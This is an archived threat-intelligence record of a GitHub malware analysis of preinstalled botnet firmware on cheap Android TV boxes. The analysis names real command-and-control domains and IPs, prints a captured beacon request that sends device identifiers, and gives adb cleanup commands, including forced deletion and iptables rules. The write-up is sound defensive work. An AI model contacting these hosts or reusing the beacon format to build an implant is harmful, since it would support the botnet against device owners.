{
	"id": "e727bfb1-0835-4d1f-8a19-d769abd430aa",
	"created_at": "2026-04-06T00:07:16.861224Z",
	"updated_at": "2026-04-10T03:20:02.172042Z",
	"deleted_at": null,
	"sha1_hash": "0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc",
	"title": "GitHub - DesktopECHO/T95-H616-Malware: \"Pre-Owned\" malware in ROM for AllWinner H616/H618 \u0026 RockChip RK3328 Android TV Boxes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 491333,
	"plain_text": "GitHub - DesktopECHO/T95-H616-Malware: \"Pre-Owned\"\r\nmalware in ROM for AllWinner H616/H618 \u0026 RockChip RK3328\r\nAndroid TV Boxes\r\nBy DesktopECHO\r\nArchived: 2026-04-05 20:41:49 UTC\r\nAllWinner H616/H618 \u0026 RockChip 3328 Android Malware Analysis · Cleanup\r\nDo you own an Android TV Box similar to one of these:\r\nT95 · AllWinner H616\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 1 of 9\n\nT95Max · AllWinner H618\r\nX12-Plus · RockChip 3328\r\nX88-Pro-10 · RockChip 3328\r\n...and have a folder named:\r\n/data/system/Corejava or a file named /data/system/shared_prefs/open_preference.xml\r\nYour device is infected with malware, constantly trying to find a C2 server to upload 'telemetry' and await\r\ncommands without your knowledge or permission. It's included with the device, straight from the merchant you\r\nordered it from.\r\n04-May-2023 · adc.flyermobi.com and 128.199.97.77 taken offline\r\nNot long after the Gigaset update, adc.flyermobi.com went offline. DNS records for that domain are gone, and\r\nthere is no response from 128.199.97.77.\r\n28-Apr-2023 · Stage 1 Classes.dex gives up its secrets\r\nStage 1 will go to http://adc.flyermobi.com/update/update.conf (was 128.199.97.77) and get the URL for Stage 2:\r\n {\"Id\":1,\"version\":\"2.802\",\"url\":\"http://adc.flyermobi.com/data/b2802.data\",\"package\":\"com.mozgame.fruitmania\",\r\nThe URL above is arbitrary and can/will change. Stage 2 payload was encrypted; decrypted version is archived as\r\nclasses.dex. This particular example is meant to generate ad-click revenue in the background, but the malware a\r\ndevice receives is at the whim of the people running this IP.\r\nFun fact: http://adc.flyermobi.com/update/update.conf is also a URL used by the Gigaset Smartphone supply chain\r\nattack of August 2021.\r\nThose responsible did a good job hiding their identity until now, but they left behind an expired SSL certificate\r\nfrom 2017 bound to port 443. It's a real certificate issued by Symantec: dsp.dotinapp.com. The https site appears\r\nto be a dev/test version of the malware being served on port 80. This certificate, likely forgotten for years, is a\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 2 of 9\n\nclear indication of those behind the malware:\r\nSome Dotinapp PR to learm about who they are and what they do. You can even find them on LinkedIn\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 3 of 9\n\nIt's worth pointing out that the PR annaouncement is from 2017, the SSL certificate is from 2017, the first C2\r\nserver (ycxrl.com) got registered in 2017, and the Amazon reviews go back to 2017 (the H616 was resleased in\r\n2020)\r\nGiven the large number of positive reviews online for these Android TV boxes, I wonder how many YouTubers\r\nwere sponsored by Dotinapp or other interested parties to review these devices?\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 4 of 9\n\n26-Apr-2023 · Email message from T95 seller?\r\nI received this email the day after their C2 servers got shut down. Apparently they were looking to clear up the\r\nconfusion with an offering of sponsorship dollars and some effusive praise!\r\n25-Apr-2023 · AllWinner H618 and RockChip RK3328 Android TV Devices are\r\n\"pre-owned\" too\r\nThanks to Tanner at LTT for letting me review his findings - It appears the scope of this issue is much bigger than\r\nexpected; many Android TV Boxes with the AllWinner H616, H618 and RockChip RK3328 feature the\r\n\"Corejava\" C2 Bootstrap.\r\n24-Apr-2023 · Akamai/Linode Terminate Command and Control Servers\r\nIn January I filled out Linode's irritating-to-use Abuse Form, only to get brushed-off with a nonsensical response\r\nby email. They have stated this is the only method available to file abuse complaints. It took a few days of\r\nbitching on Reddit to get the attention of a human Linode representative who was eventually convinced to shut\r\ndown the remaining three C2 IPs. The owners of the C2 servers were watching this whole exchange and changed\r\ntheir DNS to 127.0.0.1 in order to partially conceal their activity but it did not work. As of today, the four\r\nassociated DNS names resolve to non-routable IPs, and the servers they originally resolved to have gone dark.\r\nNote this is only a temporary reprieve as the botnet can return on new hosts at any point. We'll be watching.\r\nAdded some interesting tcpflow dumps to the repo, for example here's how the conversation starts-up with the C2\r\nservers:\r\nPOST /terminal/client/apiInfo HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/xml\r\nchannel: T10901\r\nimei: xx:xx:xx:xx:xx:xx\r\nlaunchername: com.swe.dgbluancher\r\nmodel: MBOX\r\nsdk: 29\r\nbrand: google\r\nuuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx\r\nvcode: 1\r\nandroidId: xxxxxxxxxxxxxxxx\r\nmanufacturer: Google\r\nUser-Agent: Dalvik/2.1.0 (Linux; U; Android 10; MBOX Build/QP1A.191105.004)\r\nHost: cbphe.com\r\nAccept-Encoding: gzip\r\nContent-Length: 0\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 5 of 9\n\nAllWinner and RockChip should do a little KYC before selling their SoC and tooling to anyone off the street. If\r\nthey allow the Bad Guys to create these ROMs, will they release a tool that helps end-users install a clean Android\r\nor Linux image to these devices?\r\nA few months ago I purchased a T95 Android TV box; it came with Android 10 (with working Play store) and an\r\nAllwinner H616 processor. It's a small-ish black box with a blue swirly graphic on top and a digital clock on the\r\nfront. There's got to be thousands (or more!) of these boxes already in use globally.\r\nThere are tons of them available for purchase on Amazon and AliExpress. By the end of January 2023, Amazon's\r\nselection of these devices thinned-out considerably, but a quick scan online shows they are back in large numbers.\r\nThis device's ROM turned out to be very very sketchy -- Android 10 is signed with test keys, and named\r\n\"Walleye\" after the Google Pixel 2. I noticed there was not much crapware to be found, on the surface anyway. If\r\ntest keys weren't enough of a bad omen, I found ADB wide open over Ethernet and WiFi - right out-of-the-box.\r\nI purchased the device to run Pi-hole among other things, and that's how I discovered just how nastily this box is\r\nfestooned with malware. After running the Pi-hole install I set the box's DNS1 and DNS2 to 127.0.0.1 and got a\r\nhell of a surprise. The box was reaching out to many known, active malware addresses.\r\nAfter searching unsuccessfully for a clean ROM, I set out to remove the malware in a last-ditch effort to make the\r\nT95 useful. I found layers on top of layers of malware using tcpflow and nethogs to monitor traffic and traced\r\nit back to the offending process/APK which I then removed from the ROM.\r\nThe final bit of malware I could not track down injects the system_server process and looks to be deeply-baked\r\ninto the ROM. It's pretty sophisticated malware, resembling CopyCat in the way it operates. It's not found by any\r\nof the AV products I tried -- If anyone can offer guidance on how to find these hooks into system_server let me\r\nknow.\r\nThe closest I came to neutralizing the malware was to use Pi-hole to change the DNS of the command and control\r\nserver, YCXRL.COM to 127.0.0.2. You can then monitor activity with netstat:\r\nnetstat -nputwc | grep 127.0.0.2\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34280 TIME_WAIT -\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34282 FIN_WAIT2 -\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34280 TIME_WAIT -\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34282 FIN_WAIT2 -\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34280 TIME_WAIT -\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34282 FIN_WAIT2 -\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\nI also had to create an iptables rule to redirect all DNS to the Pi-hole as the malware/virus/whatever will use\r\nexternal DNS if it can't resolve, and then tries with a nonstandard port.\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 6 of 9\n\nadb shell iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to 127.0.0.1:53\r\nadb shell iptables -t nat -A OUTPUT -p tcp --dport 53 -j DNAT --to 127.0.0.1:53\r\nadb shell iptables -t nat -A OUTPUT -p tcp --dport 5353 -j DNAT --to 127.0.0.1:53\r\nadb shell iptables -t nat -A OUTPUT -p udp --dport 5353 -j DNAT --to 127.0.0.1:53\r\nBy doing this, the C\u0026C server ends up hitting the Pi-hole webserver\r\n1672673217|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673247|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673277|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673307|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673907|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673937|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673967|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673997|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n\"Stage 0\" hooks system_server and attempts to pull-down a payload from ycxrl.com , ycxrldow.com ,\r\ncbphe.com , or cbpheback.com\r\nCleanup Instructions\r\nReboot into recovery to reset the device or use the Reset option in the 'about' menu to \"Factory Reset\" the\r\nT95\r\nWhen device comes back online, connect to adb via USB A-to-A cable or WiFi/Ethernet\r\nRun the script (WiP!)\r\nCheck if the script was successful\r\nadb logcat | grep Corejava\r\nThe script prevents a successful download from the C2 servers, as the malware can't write to /Corejava, preventing\r\nthe payload from doing naughty things on your device:\r\n101-10 23:34:39.759 2153 2153 W FileUtils: Failed to chmod(/data/system/Corejava):\r\nandroid.system.ErrnoException: chmod failed: EPERM (Operation not permitted)\r\n01-10 23:34:39.760 2153 2153 W FileUtils: Failed to chmod(/data/system/Corejava/node):\r\nandroid.system.ErrnoException: chmod failed: ENOTDIR (Not a directory)\r\nOngoing Investigation\r\nIn this repo you will find Classes.dex, the 'Stage 1' payload I managed to capture. The malware takes many\r\nmeasures to prevent from being discovered. You can install Pi-hole and tcpflow to monitor activity. Hopefully a\r\nmethod can be found to to completely disable the malware. The remediation instructions below are as close as it\r\ngets (for now.)\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 7 of 9\n\n15-Mar-2023 · News + Simplified cleanup steps:\r\nThe botnet owners changed DNS on ycxrl.com to an invalid, private IP (192.168.9.1) ... so \"stage 0\" malware is\r\nrunning, but the pre-pwn3d malware is unable to download \"stage 1\" from ycxrl.com. They can change this back\r\nanytime they like to a real IP.  Perform the following steps to prevent malware from showing up again when they\r\nchange ycxrl.com back to a real IP.\r\nInstall ADB (If not already installed):\r\nAssuming you're on Windows, to install ADB simply install Chocolatey first and install ADB using Choco:\r\nchoco install adb\r\nmacOS users have Homebrew to accomplish the same thing:\r\nbrew install android-platform-tools\r\nCleanup Steps:\r\nStart with a factory-reset device\r\nSet the root switch to enabled and restart the device\r\nGo to Settings -\u003e Network \u0026 Internet\r\nConnect to WiFi/Ethernet (preferably with a static IP and no gateway to prevent internet access) \r\nGet T95 IP address from WiFi/Ethernet settings, connect to the device and become root:\r\nadb connect [T95 IP address]\r\n  -\u003e * daemon not running; starting now at tcp:5037\r\n  -\u003e * daemon started successfully\r\n  -\u003e connected to 10.44.0.14:5555\r\nadb root\r\n  -\u003e restarting adbd as root\r\nStage 1's 'home' folder is /data/system/Corejava -- Defeat the malware by turning /data/system/Corejava into an\r\nimmutable file instead:\r\nadb shell rm -rf /data/system/Corejava\r\nadb shell touch /data/system/Corejava\r\nadb shell chmod 0000 /data/system/Corejava\r\nadb shell /vendor/bin/busybox chattr +i /data/system/Corejava\r\nAdditionally, the following prevents adups from running, which is an extra, unrelated layer of malware:\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 8 of 9\n\nadb shell pm uninstall --user 0 com.adups.fota\r\nadb shell pm uninstall --user 0 com.ftest\r\nadb shell pm uninstall --user 0 com.www.intallapp\r\nadb shell rm -rf /data/data/com.adups.fota\r\nadb shell touch /data/data/com.adups.fota\r\nadb shell chmod 0000 /data/data/com.adups.fota\r\nadb shell /vendor/bin/busybox chattr +i /data/data/com.adups.fota\r\nSource: https://github.com/DesktopECHO/T95-H616-Malware\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/DesktopECHO/T95-H616-Malware"
	],
	"report_names": [
		"T95-H616-Malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434036,
	"ts_updated_at": 1775791202,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc.pdf",
		"text": "https://archive.orkl.eu/0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc.txt",
		"img": "https://archive.orkl.eu/0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc.jpg"
	}
}